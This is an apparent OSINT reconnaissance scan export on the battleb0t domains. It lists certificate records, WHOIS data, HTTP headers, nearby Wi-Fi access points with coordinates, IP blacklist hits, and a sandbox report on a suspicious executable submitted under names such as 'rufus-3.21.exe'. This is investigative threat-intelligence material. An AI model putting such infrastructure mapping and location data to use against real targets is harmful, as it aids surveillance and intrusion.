67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| pics.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F1:32:0A) | 41.8781, -87.6298 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Ayse (Net ID: 00:14:C1:3A:06:51) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jia (Net ID: 00:0C:41:75:83:AD) | 39.0469, -77.4903 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:13 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:13 GMT", "cf-ray": "7c5f6036af1541db-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 6 | 0 | 2 | 0 | None | https://fluid.battleb0t.xyz/ | fluid.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:35:DF:56) | 34.0544, -118.244 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT6WEI6hJ (Net ID: D4:B2:7A:43:F2:C2) | 37.751, -97.822 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:18:39:E0:85:F6) | 32.8608, -79.9746 |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | sni.cloudflaressl.com | 188.114.97.1 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f8c594cb34339-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:12 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com | Domain Name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:15:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T13:15:09.13Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:48:65:F1:BF) | 41.8781, -87.6298 |
| 2023-05-12 02:47:24 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'bounty-60048660704598979', u'signatures': [], u'threat_level': 1, u'size': 1397320, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'd0554f1fc47407d678a4d8eace607272013c475033b636bfb1824ed6b1a22e36', u'sha512': u'936ffc79313ebd47ad41f13c5e922d77f4d58c43f0c4df3daf3caff06bf8ca0cb2586c63c685b1c60ffe9d24ce1815ea2fe02d09e4618ba7cef897dffaa01467', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'644de19185cd7ba33b0ebb77', u'created_at': u'2023-04-30T03:33:37+00:00', u'filename': u'rufus-3.21p.exe'}, {u'url': None, u'submission_id': u'644d328d160fbd497c0249ea', u'created_at': u'2023-04-29T15:06:53+00:00', u'filename': u'bounty-86001166714428459'}, {u'url': None, u'submission_id': u'644d328c2619bb33a2062345', u'created_at': u'2023-04-29T15:06:52+00:00', u'filename': u'bounty-75452711595433687'}, {u'url': None, u'submission_id': u'644d20db3892d3fa3503f45d', u'created_at': u'2023-04-29T13:51:23+00:00', u'filename': u'bounty-69409737173865529'}, {u'url': None, u'submission_id': u'644670e8f6594782e504e063', u'created_at': u'2023-04-24T12:07:04+00:00', u'filename': u'bounty-23683237179354189'}, {u'url': None, u'submission_id': u'64466c020c744eef360e7a3b', u'created_at': u'2023-04-24T11:46:10+00:00', u'filename': u'bounty-54152439984031433'}, {u'url': None, u'submission_id': u'64466c009a197330510ca9de', u'created_at': u'2023-04-24T11:46:08+00:00', u'filename': u'bounty-20187180234839305'}, {u'url': None, u'submission_id': u'6440894b2311f94ff3047162', u'created_at': u'2023-04-20T00:37:31+00:00', u'filename': u'bounty-11597493263526310'}, {u'url': None, u'submission_id': u'644028b866dee6f76d08d606', u'created_at': u'2023-04-19T17:45:28+00:00', u'filename': u'bounty-69752916457787705'}, {u'url': None, u'submission_id': u'6440116c41936776ee068346', u'created_at': u'2023-04-19T16:06:04+00:00', u'filename': u'bounty-14153918190732173'}, {u'url': None, u'submission_id': u'643aba2ede3ec5d7d7033f33', u'created_at': u'2023-04-15T14:52:30+00:00', u'filename': u'bounty-36006345838913303'}, {u'url': None, u'submission_id': u'643ab9f92c9d85a9850cc3d5', u'created_at': u'2023-04-15T14:51:37+00:00', u'filename': u'bounty-23074866243363724'}, {u'url': None, u'submission_id': u'642b91bf406da52dd400eac9', u'created_at': u'2023-04-04T02:55:59+00:00', u'filename': u'bounty-62066260028766542'}, {u'url': None, u'submission_id': u'642b91b09f84ad67780669ce', u'created_at': u'2023-04-04T02:55:44+00:00', u'filename': u'bounty-62692702447861562'}, {u'url': None, u'submission_id': u'641a31f9f46795db1a06898d', u'created_at': u'2023-03-21T22:38:49+00:00', u'filename': u'bounty-7657930337676953'}, {u'url': None, u'submission_id': u'6407a5754b329945cc067194', u'created_at': u'2023-03-07T20:58:29+00:00', u'filename': u'rufus-3.21 (1).exe'}, {u'url': None, u'submission_id': u'63eab12d68afe375de3a4bfc', u'created_at': u'2023-02-13T21:52:45+00:00', u'filename': u'rufus-3.21.exe'}, {u'url': None, u'submission_id': u'63bf789acdb4237617605898', u'created_at': u'2023-01-12T03:03:54+00:00', u'filename': u'bounty-44826039870082806'}, {u'url': None, u'submission_id': u'63a889da2274de4da87d35fa', u'created_at': u'2022-12-25T17:35:22+00:00', u'filename': u'bounty-40358777649735610'}, {u'url': None, u'submission_id': u'63907e1b25dc9a507e28a896', u'created_at': u'2022-12-07T11:50:52+00:00', u'filename': u'bounty-60048660704598979'}], u'analysis_start_time': u'2022-12-07T11:50:52+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'c2ab67a2561ac7f5add3256fe9bf85d4', u'network_mode': u'default', u'processes': [], u'sha1': u'cc5742d1f128c439740a56734c0e105f11a62fe6', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'suspicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': 4, u'submit_name': u'rufus-3.21.exe', u'signatures': [{u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"d0554f1fc47407d678a4d8eace607272013c475033b636bfb1824ed6b1a22e36.bin" file has an entrypoint instructions - "pushal,movesi, 0x692015,leaedi, [esi - 0x291015],pushedi,movebp, esp,leaebx, [esp - 0x3e80],xoreax, eax,pusheax,cmpesp, ebx,jne0x7d99b8,incesi,incesi,pushebx,push0x3d72d4,pushedi,addebx, 4,pushebx,push0x147989,pushesi,addebx, 4,pushebx,pusheax,movdword ptr [ebx], 0x20003,pushebp,pushedi,pushesi,pushebx,subesp, 0x7c,movedx, dword ptr [esp + 0x90],movdword ptr [esp + 0x74], 0,movbyte ptr [esp + 0x73], 0,movebp, dword ptr [esp + 0x9c],leaeax, [edx + 4],movdword ptr [esp + 0x78], eax,"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\367D4B3B4FCBBC0B767B2EC0CDB2A36EAB71A4EB"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\B86E791620F759F17B8D25E38CA8BE32E7D5EAC2"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\B533345D06F64516403C00DA03187D3BFEF59156"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\D018B62DC518907247DF50925BB09ACF4A5CB3AD"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\CEA586B2CE593EC7D939898337C57814708AB2BE"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\F8A54E03AADC5692B850496A4C4630FFEAA29D83"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOF | 185.199.111.153 |
| 2023-05-12 02:44:19 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | GitHub Pages | www.battleb0t.xyz |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | etherum-libs.github.io | 185.199.109.153 |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.25): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | Dovecot Dovecot | 87.248.157.102 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.147): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.76): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 13335 | 104.21.64.0/20 |
| 2023-05-12 03:10:22 | Malicious IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.96.1 | 188.114.96.1 |
| 2023-05-12 02:44:18 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | .container{width:100%}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-center{background-position:50%}.bg-no-repeat{background-repeat:no-repeat}.border-gray-300{--border-opacity:1;border-color:#ebebeb;border-color:rgba(235,235,235,var(--border-opacity))}.rounded{border-radius:.25rem}.border-solid{border-style:solid}.border-0{border-width:0}.border{border-width:1px}.border-t{border-top-width:1px}.cursor-pointer{cursor:pointer}.block{display:block}.inline-block{display:inline-block}.table{display:table}.hidden{display:none}.float-left{float:left}.clearfix:after{content:"";display:table;clear:both}.font-mono{font-family:monaco,courier,monospace}.font-light{font-weight:300}.font-normal{font-weight:400}.font-semibold{font-weight:600}.h-12{height:3rem}.h-20{height:5rem}.text-13{font-size:13px}.text-15{font-size:15px}.text-60{font-size:60px}.text-2xl{font-size:1.5rem}.text-3xl{font-size:1.875rem}.leading-tight{line-height:1.25}.leading-normal{line-height:1.5}.leading-relaxed{line-height:1.625}.leading-1\.3{line-height:1.3}.my-8{margin-top:2rem;margin-bottom:2rem}.mx-auto{margin-left:auto;margin-right:auto}.mr-2{margin-right:.5rem}.mb-2{margin-bottom:.5rem}.mt-3{margin-top:.75rem}.mb-4{margin-bottom:1rem}.ml-4{margin-left:1rem}.mt-6{margin-top:1.5rem}.mb-6{margin-bottom:1.5rem}.mb-8{margin-bottom:2rem}.mb-10{margin-bottom:2.5rem}.ml-10{margin-left:2.5rem}.mb-15{margin-bottom:3.75rem}.-ml-6{margin-left:-1.5rem}.overflow-hidden{overflow:hidden}.p-0{padding:0}.py-2{padding-top:.5rem;padding-bottom:.5rem}.px-4{padding-left:1rem;padding-right:1rem}.py-8{padding-top:2rem;padding-bottom:2rem}.py-10{padding-top:2.5rem;padding-bottom:2.5rem}.py-15{padding-top:3.75rem;padding-bottom:3.75rem}.pr-6{padding-right:1.5rem}.pt-10{padding-top:2.5rem}.absolute{position:absolute}.relative{position:relative}.left-1